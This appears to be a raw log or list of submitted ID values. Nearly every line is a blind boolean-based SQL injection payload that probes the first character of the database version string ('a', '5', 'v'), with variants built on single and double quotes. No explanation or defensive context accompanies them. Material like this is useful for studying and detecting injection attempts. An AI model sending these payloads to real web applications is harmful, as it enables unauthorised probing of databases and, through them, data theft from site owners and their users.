ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1
ID:2
ID:'1'=(left((seLect(group_concat(@@version))),1)='a')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='a')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='a')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:'1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1'
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='5')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='a')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1'=(left((seLect(group_concat(@@version))),1)='v')='1
ID:1"=(left((seLect(group_concat(@@version))),1)='v')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='v')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='v')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='v')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='v')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='5')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='5')="1
ID:1"=(left((seLect(group_concat(@@version))),1)='a')="1
